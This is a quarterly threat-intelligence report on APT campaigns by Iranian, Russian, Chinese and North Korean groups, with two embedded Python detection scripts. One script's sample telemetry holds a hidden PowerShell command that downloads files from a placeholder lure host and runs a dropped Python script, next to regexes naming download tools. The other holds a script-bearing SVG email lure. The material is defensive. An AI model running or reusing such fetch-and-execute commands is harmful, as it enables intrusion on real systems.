In the fourth quarter of 2023, Advanced Persistent Threat (APT) groups from diverse global regions, including China, North Korea, Iran, and Russia, demonstrated a surge in dynamic and innovative cyber activities, posing significant challenges to the global cybersecurity landscape.
Iranian threat actors, including IMPERIAL KITTEN, MuddyWater, and OilRig, escalated cyber operations across diverse sectors, employing refined techniques and sophisticated malware frameworks. Most Iranian threat actors’ campaigns were influenced by the Israel-Hamas conflict in the region.
Simultaneously, Russian threat actors, notably APT28 and APT29, exhibited an alarming escalation with innovative tactics, including exploiting a Roundcube Webmail zero-day and leveraging a WinRAR vulnerability. Winter Vivern showcased adaptability by introducing the LittleDrifter worm through USB drives, emphasizing a sustained focus on governmental organizations.
Chinese threat actors exhibited noteworthy cyber capabilities, with Volt Typhoon showcasing agility by leveraging the KV-Botnet to target small office/home office (SOHO) devices and expanding to Axis IP cameras. ToddyCat, another Chinese-affiliated APT group, unveiled a new set of malicious tools emphasizing data exfiltration, showcasing evolving tactics. Also, the “Stayin’ Alive” campaign attributed to ToddyCat highlighted the use of “disposable” malware to target government organizations and telecommunication service providers across Asia.
Meanwhile, North Korean threat actors, including Lazarus Group and subgroups like Diamond Sleet, Onyx Sleet, and Sapphire Sleet, engaged in sophisticated cyber operations. Lazarus Group’s Operation Blacksmith revealed the use of new DLang-based malware families targeting European manufacturing entities, while Operation Dream Magic exploited vulnerabilities in MagicLine4NX software. Sapphire Sleet shifted tactics to target IT job seekers through fake skills assessment portals.
Overall, this report provides a comprehensive analysis of the dynamic APT activities observed in Q4 2023, highlighting the imperative for ongoing vigilance, user education, and prompt software updates in the ever-evolving cybersecurity landscape.
[Summary table for Iranian threat actors (contents not preserved): Technique observed | Targeted Country | Targeted Technology | Targeted Industries]
In Q4 2023, the Iranian threat group IMPERIAL KITTEN intensified its cyber operations, focusing on sectors such as transportation, logistics, and technology. Their modus operandi involved enticing victims with adversary-controlled websites based on shared interests, especially after the Israel-Hamas conflict. Their tactics included the deployment of public scanning tools, one-day exploits, SQL injections, and the misuse of VPN credentials for initial breaches. For lateral movement, they employed tools like PAExec and engaged in credential theft. Their data exfiltration methods employed both custom and readily available malware, with notable similarities to their Liderc malware family, indicating a continued reliance on email-based command and control (C2) mechanisms. IMPERIAL KITTEN’s operations often exploit social engineering, predominantly through job recruitment-themed content, to disseminate custom .NET-based implants. Their historical targets span industries like defense, technology, telecommunications, maritime, energy, and consulting.
During Q4 2023, amidst the Israel-Hamas conflict, MuddyWater initiated a sophisticated social engineering campaign targeting Israel, incorporating updated tactics, techniques, and procedures (TTPs). Central to their strategy was the use of a new public hosting service and a deceptive LNK file to trigger infections. Furthermore, they introduced an intermediate malware layer that imitates directory openings while deploying a fresh remote administration tool. Upon successful infiltration, MuddyWater operators harnessed this legitimate tool for target reconnaissance. Subsequently, they employed PowerShell scripts, prompting the compromised system to communicate with a tailored command and control (C2) server. While MuddyWater has previously utilized PhonyC2, recent observations indicate a shift towards a new C2 framework dubbed MuddyC2Go.
In another campaign, MuddyWater intensified its focus on the telecommunications sector in Egypt, Sudan, and Tanzania. Their campaign observed in November showcased a blend of familiar and novel tools, notably the recently uncovered MuddyC2Go infrastructure. Beyond this, the group employed the SimpleHelp remote access tool, Venom Proxy, a bespoke keylogger, and a mix of publicly accessible and “living-off-the-land” tools. Notably, the campaign’s initial traces pointed to PowerShell activities associated with the MuddyC2Go backdoor. MuddyWater’s persistent activities underscore its active threat status, particularly for entities that might attract Iranian strategic interests.
In Q4 2023, the Iran-associated APT group, ‘OilRig,’ intensified its cyber operations targeting Israel’s critical sectors, notably healthcare, manufacturing, and government. Employing a series of newly developed lightweight downloaders, namely SampleCheck5000 (SC5k v1-v3), ODAgent, OilCheck, and OilBooster, OilRig enhanced its extensive portfolio of bespoke malware tools. Distinctively, these downloaders exploit legitimate cloud services like Microsoft OneDrive and various Microsoft Graph APIs for both command-and-control (C2) communications and data exfiltration, marking a departure from traditional methods. Among the targeted entities were a healthcare facility, a manufacturing firm, a local governmental body, and several undisclosed Israeli organizations. Notably, OilRig’s selection of these targets was strategic, revisiting entities previously subjected to the group’s cyber onslaught, suggesting the downloaders’ efficacy in evading detection by seamlessly integrating into routine network traffic.
The Iran-associated APT group, Agrius, launched its cyber operations against Israeli higher education and technology sectors. From January to October, Agrius orchestrated a multifaceted campaign aimed at pilfering personally identifiable information (PII), intellectual property, and subsequently deploying wipers like MultiLayer, PartialWasher, and BFG Agonizer to erase digital footprints. During the infiltration phase, Agrius leveraged vulnerable web servers, bolstering its access through multiple web shells. To evade detection, the group harnessed a repertoire of proof-of-concept exploits, pentesting instruments, and custom tools. Agrius’ operational toolkit encompassed publicly accessible tools such as Nbtscan, Wineggdrop and NimScan for reconnaissance, Mimikatz for credential theft, Plink for lateral movement, and WinSCP and Putty for data exfiltration. Notably, their Sqlextractor tool specialized in querying SQL databases, extracting a plethora of sensitive data, ranging from ID numbers to passport scans and contact details.
The IRGC-affiliated cyber group operating under the alias “CyberAv3ngers” increased its activities, targeting Israeli-made Unitronics Vision Series programmable logic controllers (PLCs) predominantly used in the Water and Wastewater Systems (WWS) sector. These PLCs are also deployed across other sectors, including energy, food and beverage manufacturing, and healthcare. Recently, a Unitronics Vision Series PLC at a water system facility in Pennsylvania was compromised by Iran-affiliated attackers, as verified by CISA. Notably, CyberAv3ngers has a track record of targeting critical infrastructure in Israel and has recently expanded its scope to U.S.-based water and wastewater facilities. In response, CISA has issued directives urging water authorities to enhance PLC security by changing default credentials, implementing robust access controls such as firewalls, VPNs, and multi-factor authentication, regularly backing up configurations, and updating to the latest PLC/HMI versions.
[Summary table for Russian threat actors (contents not preserved): Technique observed | Targeted Country | Targeted Technology | Targeted Industries]
In Q4 2023, the Russian APT group Cozy Bear exhibited a sophisticated cyber campaign by exploiting a TeamCity server authentication vulnerability, tracked as CVE-2023-42793, which had been disclosed and patched in September. This widespread exploitation, impacting “a few dozen” companies across the U.S., Europe, Asia, and Australia, targeted entities ranging from an energy trade association to software providers in various sectors. Notably, the compromised companies included those involved in billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games, as well as hosting and IT firms. While CISA clarified that Cozy Bear’s tactics did not mirror the SolarWinds incident, it cautioned that the activity posed a supply chain threat. Following initial access and privilege escalation through the TeamCity vulnerability, the threat actor employed the GraphicalProton backdoor, utilizing Microsoft OneDrive and Dropbox for data sharing with the SVR operator. Employing the “bring your own vulnerable driver” technique, Cozy Bear demonstrated a novel evasion tactic, aligning with the increasingly common methods observed among ransomware groups. The compromise of a TeamCity server offers malicious actors access to source code, signing certificates, and the potential to manipulate software compilation and deployment processes, thereby enabling supply chain operations. Recent scans revealed 700 unpatched TeamCity servers globally, predominantly in the U.S. and Europe.
In another sophisticated cyber campaign, APT29 exploited a recently disclosed vulnerability in the Windows file archiver tool WinRAR, identified as CVE-2023-38831. State-controlled hackers affiliated with Russia and China had already leveraged this bug in early 2023, before it was patched, leaving unpatched versions of WinRAR exposed to potential exploitation. In this campaign, APT29 deployed phishing emails enticing victims with a link to a PDF document, alongside a malicious ZIP file exploiting the WinRAR vulnerability. The fabricated lure involved claims of information regarding the sale of diplomatic BMW cars, a tactic previously employed during their attack on Kyiv embassies. Notably, APT29 combined this traditional phishing method with a new technique: using a Ngrok free static domain to reach the command and control (C2) server hosted on their Ngrok instance. This method effectively concealed their activity, allowing the attackers to communicate with compromised systems without raising detection risks. APT29’s observed campaign stands out for its adept fusion of old and new techniques, showcasing the strategic use of the WinRAR vulnerability for payload delivery and Ngrok services to obfuscate C2 communication.
In Q4 2023, the Russian state-sponsored APT28, also known as “Fancy Bear” or “Strontium,” emerged as an active threat, exploiting the CVE-2023-23397 Outlook vulnerability to compromise Microsoft Exchange accounts and pilfer sensitive data. The scope of their activities encompassed government, energy, transportation, and other vital organizations in the United States, Europe, and the Middle East. APT28 demonstrated a strategic approach, reserving the use of these exploits for instances where the benefits of access and intelligence outweighed the risks of public exposure. It was disclosed that APT28 had been leveraging this flaw since April 2022 through specially crafted Outlook notes, designed to steal NTLM hashes by forcing authentication to attacker-controlled SMB shares without user interaction. Exploiting this straightforward privilege escalation, APT28 executed lateral movement within the victim’s environment, manipulating Outlook mailbox permissions for targeted email theft. Despite the availability of security updates and mitigation recommendations, the attack surface remained substantial, emphasizing the persistent challenge posed by APT28’s strategic and targeted exploitation.
In another incident, the Computer Emergency Response Team of Ukraine (CERT-UA) sounded the alarm on a novel cyber espionage campaign orchestrated by the Russia-linked APT28, also known as “Forest Blizzard,” “Fancy Bear,” or “Strontium.” This campaign marked a strategic shift, as APT28 deployed previously undetected malware, including OCEANMAP, MASEPIE, and STEELHOOK, to covertly extract sensitive information from targeted networks. CERT-UA’s investigation uncovered a series of phishing attacks, specifically targeting government organizations between December 15 and December 25. The phishing emails employed deceptive tactics, enticing recipients to click on embedded links under the pretense of accessing a document. Once clicked, victims were redirected to a web resource where, leveraging JavaScript and the application protocol “search” (“ms-search”), a shortcut file (LNK) was downloaded. Upon opening the LNK file, a PowerShell command initiated the download of a decoy document from a remote server, accompanied by the Python interpreter and the MASEPIE tool. MASEPIE, a Python-based utility, served the dual purpose of uploading/downloading files and executing commands. Notably, APT28 utilized MASEPIE to introduce OPENSSH (for tunneling), STEELHOOK PowerShell scripts (for data extraction from Chrome/Edge browsers), and the OCEANMAP backdoor into the compromised environments, underscoring the group’s evolving and sophisticated tactics in pursuit of their espionage objectives.
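The infection chain above (LNK opened by the user, PowerShell fetching a decoy plus a Python interpreter and a script, the script running from a user-writable path) can be surfaced from process-creation telemetry. The following is an added detection example, not CERT-UA tooling; the event records are constructed in Sysmon Event ID 1 style, and the field names (pid, ppid, image, cmdline) are an assumption of this example.

```python
"""Correlate process-creation events for the LNK -> PowerShell -> Python chain.

A PowerShell process whose parent is explorer.exe (what opening an LNK looks
like) is scored on three indicators: a download cradle in its command line, a
hidden window, and a Python child running from a user-writable directory.
"""
import re
from collections import defaultdict

# Paths a standard user can write to; an interpreter running from here was dropped, not installed.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads|desktop)|programdata|windows\\temp)\\", re.I)
# PowerShell download cradles commonly seen in a first stage.
DOWNLOAD_CRADLE = re.compile(
    r"\b(invoke-webrequest|iwr|downloadfile|downloadstring|start-bitstransfer|net\.webclient|curl|wget)\b",
    re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [  # constructed sample telemetry, not real events
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # Malicious chain: explorer launches PowerShell (LNK opened), which fetches a decoy,
    # a Python interpreter and a script, then runs the script from %TEMP%.
    {"pid": 200, "ppid": 100, "image": PS,
     "cmdline": 'powershell.exe -w hidden -c "iwr https://lure.example.invalid/doc.pdf '
                '-OutFile $env:TEMP\\doc.pdf; iwr https://lure.example.invalid/py.zip '
                '-OutFile $env:TEMP\\py.zip; & $env:TEMP\\python\\python.exe $env:TEMP\\client.py"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Users\alice\AppData\Local\Temp\python\python.exe",
     "cmdline": r"python.exe C:\Users\alice\AppData\Local\Temp\client.py"},
    # Benign: a user double-clicks a backup script; no cradle, no hidden window, no dropped interpreter.
    {"pid": 400, "ppid": 100, "image": PS, "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    # Benign: an installed interpreter started by something other than PowerShell.
    {"pid": 500, "ppid": 1, "image": r"C:\Program Files\Python311\python.exe",
     "cmdline": r"python.exe C:\Projects\app\main.py"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_lnk_powershell_chain(events, min_reasons=2):
    """Return one alert per PowerShell process matching at least min_reasons indicators."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    alerts = []
    for e in events:
        if basename(e["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        # Opening an LNK from the desktop or a download folder makes explorer.exe the parent.
        if parent is None or basename(parent["image"]) != "explorer.exe":
            continue
        reasons = []
        if DOWNLOAD_CRADLE.search(e["cmdline"]):
            reasons.append("download cradle in command line")
        if HIDDEN_WINDOW.search(e["cmdline"]):
            reasons.append("hidden window requested")
        for child in children[e["pid"]]:
            if basename(child["image"]).startswith("python") and USER_WRITABLE.search(child["image"]):
                reasons.append("spawned Python interpreter from user-writable path: " + child["image"])
        if len(reasons) >= min_reasons:
            alerts.append({"pid": e["pid"], "cmdline": e["cmdline"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_lnk_powershell_chain(EVENTS):
        print(f"pid {alert['pid']}: {'; '.join(alert['reasons'])}")
```

Requiring two of the three indicators keeps a user who merely double-clicks a local script from alerting, while the dropped interpreter alone is a strong enough signal to review even when the cradle is obfuscated.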
In Q4 2023, a recently uncovered worm, dubbed LittleDrifter, emerged as a tool within the arsenal of the Gamaredon state-sponsored espionage group, spreading via USB drives and infecting systems across several countries. Researchers detected signs of compromise in the United States, Ukraine, Germany, Vietnam, Poland, Chile, and Hong Kong, indicating that LittleDrifter may have strayed beyond its intended targets, possibly due to a loss of control by the threat group. While members of the APT were previously identified as employees of Russia’s Federal Security Service (FSB), Gamaredon has also engaged in hack-for-hire activities. Notably, the group has displayed adaptability, altering tactics and tools to effectively compromise Ukrainian targets and maintain persistent access to their networks. LittleDrifter, a recently identified self-propagating USB worm, stands as a testament to this adaptability. Written in VBScript, the malware possesses functionalities to automatically spread to USB drives, communicate with a diverse set of command-and-control (C&C) servers, and execute payloads received from the C&C. Despite its apparent simplicity, LittleDrifter aligns with Gamaredon’s overarching strategy, emphasizing effectiveness over complexity, a principle that has proven successful in sustaining the group’s activities, particularly in Ukraine.
The Russian hacking group Winter Vivern heightened its cyber operations by exploiting a zero-day vulnerability in Roundcube Webmail, targeting European government entities and think tanks since at least October 11. The Roundcube development team promptly addressed the security concern, releasing updates to rectify the Stored Cross-Site Scripting (XSS) vulnerability (CVE-2023-5631). Winter Vivern’s modus operandi involved leveraging HTML email messages, embedding meticulously crafted SVG documents to remotely inject arbitrary JavaScript code. Their phishing tactics mimicked the Outlook Team, enticing victims to open malicious emails, automatically triggering a first-stage payload that exploited the Roundcube email server vulnerability. The final JavaScript payload deployed in these attacks facilitated the harvesting and theft of emails from compromised webmail servers. Winter Vivern’s strategic focus on governmental organizations, particularly those using Zimbra and Roundcube email servers, dates back to at least 2022. Notably, the same vulnerability was exploited by the Russian APT28 military intelligence hackers affiliated with Russia’s General Staff Main Intelligence Directorate (GRU) to compromise Roundcube email servers within the Ukrainian government. Winter Vivern’s evolution from exploiting known vulnerabilities to deploying a zero-day underscores their persistent threat, demonstrated through regular phishing campaigns, making them a significant concern for European and Asian governments.
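Because the delivery vehicle above is an HTML email carrying an SVG document with script, a mail-gateway triage check can flag such messages before they reach a webmail sanitizer. The following is an added example, not Roundcube code or its sanitizer; it uses only the Python standard library, and the message it scans is constructed for illustration with a harmless placeholder in place of any payload.

```python
"""Flag script-capable SVG in HTML e-mail parts, as a triage check.

Inline <svg> elements are walked for <script> children, on* event handlers
and javascript: URLs; <object>/<embed>/<iframe> elements that reference an
SVG document by type or by .svg path are flagged too, since SVG loaded that
way also executes script.
"""
import email
import re
from email import policy
from html.parser import HTMLParser

EVENT_ATTR = re.compile(r"^on[a-z]+$")      # HTMLParser lower-cases attribute names
URL_ATTRS = {"href", "xlink:href", "src", "data"}
SVG_HINTS = ("image/svg+xml", ".svg")


class SvgScriptFinder(HTMLParser):
    """Collects findings while tracking whether we are inside an <svg> subtree."""

    def __init__(self):
        super().__init__()
        self.svg_depth = 0
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = [(name, (value or "").strip()) for name, value in attrs]
        if tag in ("object", "embed", "iframe"):
            for name, value in attrs:
                if name in ("type", "data", "src") and any(h in value.lower() for h in SVG_HINTS):
                    self.findings.append(f"<{tag}> references an SVG document")
                    break
        if tag == "svg":
            self.svg_depth += 1
        if self.svg_depth == 0:
            return
        if tag == "script":
            self.findings.append("<script> element inside <svg>")
        for name, value in attrs:
            if EVENT_ATTR.match(name):
                self.findings.append(f"event handler {name}= inside <svg>")
            elif name in URL_ATTRS and value.lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name}= inside <svg>")

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth:
            self.svg_depth -= 1


def scan_html(body):
    """Return the list of findings for one HTML or SVG document (empty if clean)."""
    finder = SvgScriptFinder()
    finder.feed(body)
    finder.close()
    return finder.findings


def scan_message(raw):
    """Walk every MIME part; text/html bodies and image/svg+xml attachments are scanned alike."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype in ("text/html", "image/svg+xml"):
            text = part.get_content()
            if isinstance(text, bytes):
                text = text.decode("utf-8", "replace")
            findings.extend(f"{ctype}: {f}" for f in scan_html(text))
    return findings


# Constructed sample: an "Outlook Team" lure carrying an inline SVG with script hooks.
SAMPLE_MESSAGE = b"""\
From: "Outlook Team" <no-reply@example.invalid>
To: recipient@example.invalid
Subject: Mailbox storage notice
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Your mailbox is almost full.</p>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
  <script>/* constructed placeholder, no real payload */</script>
</svg>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_message(SAMPLE_MESSAGE):
        print(finding)
```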
[Summary table for Chinese threat actors (contents not preserved): Technique observed | Targeted Country | Targeted Industries | Targeted Technology]
The Chinese APT group Volt Typhoon demonstrated sophistication in its cyber operations during Q4. Researchers disclosed the link between the KV-Botnet and the China-linked threat actor Volt Typhoon during this period. The botnet, operational since February 2022, targets small office/home office (SOHO) devices, including routers, and recently expanded to Axis IP cameras. Volt Typhoon, known for infiltrating critical infrastructure, employs living-off-the-land techniques and hands-on-keyboard activity to evade detection. The threat actor has been seen routing malicious traffic through compromised SOHO network devices. The recent shift to target IP cameras and the remodeling of its infrastructure suggest preparation for an upcoming campaign. The researchers predict a continued focus on end-of-life (EoL) SOHO devices to establish covert infrastructure, taking advantage of the abundance of outdated devices that are no longer eligible for patches and are often operated by users lacking the resources and expertise to monitor for and detect malicious activity.
Volt Typhoon’s primary motivation revolves around building capabilities to potentially disrupt critical communications infrastructure between the United States and the Asia region in the event of future crises. Notably, the observed campaign, limited to China-linked actors, has focused primarily on strategic interests in the Indo-Pacific region, with a discernible concentration on Internet Service Providers (ISPs) and government organizations.
In a significant development during October, the Chinese APT41 group, also known as Wicked Panda, was linked to the use of the surveillance toolkit LightSpy. APT41 employed spam messages to deceive users into downloading a malicious WeChat application from third-party app stores. The LightSpy malware, compatible with iOS and Android devices, is capable of exfiltrating private information, including precise location, payment data, call recordings, and chat archives. APT41, previously associated with web application attacks and software vulnerability exploitation, has recently shifted tactics to develop mobile-specific malware. The group’s use of LightSpy for iOS and DragonEgg for Android demonstrates its ability to target multiple platforms. The malicious WeChat version enabled broad access permissions on targeted devices, facilitating the exfiltration of internal private information. The threat actors behind APT41 have active servers in China, Singapore, and Russia, primarily targeting victims in the Asia-Pacific region.
A recently uncovered campaign named “Stayin’ Alive” has been systematically targeting government organizations and telecommunication service providers across Asia since 2021, with Q4 2023 observations revealing its use of diverse “disposable” malware to evade detection. The campaign primarily employs loaders and downloaders, with some serving as initial infection vectors against high-profile Asian organizations in Kazakhstan, Uzbekistan, Pakistan, and Vietnam. One notable tool, CurKeep, is activated by executing a legitimate executable signed by Zoom, which loads dal_keepalives[dot]dll, which in turn initiates CurKeep. Additional custom-made tools involved in the campaign include CurLu, CurCore, and StylerServ. Spear-phishing emails serve as the campaign’s delivery method, distributing archived files that use DLL side-loading, exploiting dal_keepalives[dot]dll in Audinate’s Dante Discovery software (CVE-2022-23748). Driven by espionage motives, the ToddyCat APT group orchestrating the Stayin’ Alive campaign has a history of pilfering sensitive data such as intellectual property, trade secrets, and government documents. Operating since at least 2020, ToddyCat employs various techniques, including spear-phishing emails, zero-day exploits, and supply chain attacks, to gain access to target systems, subsequently deploying a range of malware, including backdoors, trojans, and keyloggers.
Meanwhile, ToddyCat has recently been associated with a novel set of malicious tools designed for data exfiltration. While the group’s weaponry prominently features the Ninja Trojan and a backdoor known as Samurai, a fresh array of malicious software has been developed and maintained by ToddyCat to achieve persistence, conduct file operations, and dynamically load additional payloads. This includes a suite of loaders with the ability to launch the Ninja Trojan as a second stage, LoFiSe for locating and collecting targeted files, a DropBox uploader for storing stolen data, and Pcexter for exfiltrating archive files to Microsoft OneDrive. In addition to these tools, ToddyCat employs custom scripts for data collection, a passive backdoor that receives commands via UDP packets, Cobalt Strike for post-exploitation maneuvers, and compromised domain admin credentials to facilitate lateral movement, amplifying its espionage activities. Notably, the observed script variants are tailored explicitly for data collection and file copying to specific folders, excluding them from compressed archives. In such instances, the actor executes the script on the remote host using standard remote task execution techniques, manually transfers the collected files to the exfiltration host via the xcopy utility, and ultimately compresses them using the 7z binary. This multifaceted approach underscores ToddyCat’s commitment to advanced and intricate methodologies in pursuit of its espionage objectives.
[Summary table for North Korean threat actors (contents not preserved): Technique observed | Targeted Country | Targeted Technology | Targeted Industries]
In a recent cybersecurity revelation, the Lazarus Group, a sophisticated hacking collective associated with North Korea, has initiated an advanced operation known as “Operation Blacksmith.” This operation introduces three new DLang-based malware families: the Telegram-based “NineRAT,” the non-Telegram-based RAT named “DLRAT,” and a DLang-based downloader named “BottomLoader.” The targeted assault specifically focuses on European manufacturing entities in September 2023, South American agricultural organizations, and an American subsidiary of a South Korean physical security firm as early as May 2023. Operation Blacksmith unfolds in two main phases, with the Lazarus Group exploiting CVE-2021-44228 (Log4Shell) in Phase 1 to gain initial access to publicly facing VMware Horizon servers. Following successful exploitation, the group conducts preliminary reconnaissance and installs a proxy tool for direct access to the compromised system.
The BottomLoader downloader is then used to download and execute the next-stage payload, such as HazyLoad, while avoiding detection. HazyLoad dynamically switches to new remote IP addresses to maintain access. In Phase 2, after successful credential dumping, Lazarus introduces the new RATs, NineRAT and DLRAT, with DLRAT employing innovative tactics to enhance communication with the command and control (C2) server. NineRAT engages in Telegram-based communication, re-fingerprinting infected systems. This operation reveals a dynamic and sophisticated APT campaign marked by diverse programming languages, innovative tactics, and opportunistic targeting of critical sectors. The existence of sub-groups within Lazarus emphasizes collaboration and specialization, showcasing a multifaceted and adaptive threat landscape. The group’s commitment to persistence, redundancy in backdoor entries, and hands-on keyboard activities underscores the ongoing evolution of APT strategies.
In Q4 2023, the North Korean Lazarus Group’s sub-group BlueNoroff initiated a campaign named “RustBucket,” featuring a newly unveiled Mac malware named “ObjCShellz” and targeting users in the US and Japan. Described as “dumbed down” yet effective, the malware serves the purpose of opening remote shells on compromised devices. The malicious payload establishes communication with swissborg[.]blog, a command-and-control domain posing as a legitimate cryptocurrency exchange site. BlueNoroff’s campaigns maintain a financial motivation, with a consistent focus on cryptocurrency exchanges, venture capital firms, and banks. The group employs social engineering tactics, masquerading as investors or headhunters to blend in with legitimate crypto company activities, aligning with the RustBucket campaign. From a technical standpoint, ObjCShellz is notably simplistic, functioning as a basic reverse shell for Apple computers that allows command execution from an attacker’s server. Written in Objective-C, the malware operates as a straightforward remote shell executing commands sent from the attacker server. While the method of initial access remains unclear, ObjCShellz is likely employed as a later-stage tool for manual command execution after system compromise. Despite its apparent differences from the previously mentioned RustBucket malware used in other attacks, both instances underscore the attacker’s focus on providing a straightforward remote shell capability.
Another cyber-attack named Operation Dream Magic emerged in Q4, and it has been attributed to the Lazarus group from North Korea. The attackers are using a flaw in MagicLine4NX software, affecting versions before 1.0.026. They start by compromising a news website and embedding harmful code. When users with vulnerable software visit the compromised site, the code executes, allowing attackers to take control of their systems. The malicious code then performs various actions like spying, stealing data and moving through the network. The attackers use the network’s data synchronization function to spread the code to the organization’s servers, compromising PCs.
Meanwhile, in a significant development, the North Korean APT groups Diamond Sleet and Onyx Sleet, operating under the Lazarus Group, have been actively exploiting a critical vulnerability, CVE-2023-42793, in JetBrains TeamCity, as highlighted by Microsoft. This vulnerability, with a CVSS score of 9.8, allows for authentication bypass in the on-premises version of TeamCity. Exploiting this flaw provides attackers with the ability to pilfer source code, service secrets, and private keys, compromising the integrity of software used by downstream users. The attacks involve sophisticated chains, incorporating PowerShell-based payload downloads, DLL search-order hijacking, and the creation of unauthorized user accounts. The state-sponsored hackers leverage custom tools such as ForestTiger and HazyLoad, and exploit RDP for system compromise and credential retrieval. Recognizing the severity of the situation, the U.S. CISA added JetBrains TeamCity to its Known Exploited Vulnerabilities Catalog in October, underscoring the urgency of addressing this threat.
In a noteworthy shift of tactics, North Korea’s APT group Sapphire Sleet, a subset of Lazarus known for cryptocurrency theft from exchanges, venture capital firms, and banks, has initiated a targeted campaign against IT job seekers, using deceptive skills assessment portals. This new social engineering effort involves the creation of fraudulent websites, designed to deceive recruiters, marking a departure from the group’s previous use of LinkedIn. Engaging victims through instant messaging and email, Sapphire Sleet employs weaponized attachments or links on legitimate platforms like GitHub. Researchers emphasize the significance of this evolution, as the group adapts its communication methods and employs new attack vectors, such as the creation of deceptive websites, following prior exposures.
In Q4 2023, threat actors from Iran, Russia, China, and North Korea continued to engage in sophisticated and diverse cyber operations, showcasing adaptability and innovation in their tactics, techniques, and procedures (TTPs). Iranian actors targeted organizations in the telecommunications, higher education, and technology sectors, employing updated TTPs and leveraging new C2 frameworks. Russian APT activities focused on exploiting vulnerabilities such as the TeamCity server flaw, the WinRAR file archiver flaw, the Outlook vulnerability, and the Roundcube email server vulnerability, showcasing a continued focus on supply chain attacks. Chinese threat actors, represented by Volt Typhoon and ToddyCat, demonstrated a focus on targeting small office/home office (SOHO) devices and utilizing advanced malware for data exfiltration. The North Korean Lazarus Group, through operations like Operation Blacksmith and Operation Dream Magic, revealed its proficiency in diverse programming languages, exploiting vulnerabilities like Log4Shell and MagicLine4NX, and employing social engineering tactics. These threat actors displayed a dynamic approach in their TTPs, emphasizing the importance of cybersecurity vigilance and countermeasures against evolving APT strategies.